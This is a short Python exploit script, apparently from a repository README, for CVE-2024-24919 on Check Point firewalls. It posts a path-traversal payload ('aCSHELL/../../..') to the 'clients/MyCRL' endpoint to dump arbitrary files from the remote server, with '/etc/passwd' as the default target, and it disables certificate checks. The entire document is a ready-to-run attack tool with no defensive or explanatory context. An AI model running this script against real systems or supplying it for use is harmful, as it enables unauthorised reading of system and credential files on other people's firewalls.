README.md
Rendering markdown...
import requests
import argparse
from urllib.parse import urljoin
def send_post_request(base_url, file):
full_url = urljoin(base_url, 'clients/MyCRL')
full_payload = "aCSHELL/../../../../../../.." + file
headers = {
'Content-Length': str(len(full_payload))
}
response = requests.post(full_url, data=full_payload, headers=headers, verify=False)
print('Status Code:', response.status_code)
print('Response:', response.content.decode())
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit the CVE-2024-24919 on the remote checkpoint firewall.')
parser.add_argument('-u', '--url', required=True, help='The base URL to send the POST request to.')
parser.add_argument('-f', '--file', default='/etc/passwd', help='The file to be dumped from the remote checkpoint server.')
args = parser.parse_args()
send_post_request(args.url, args.file)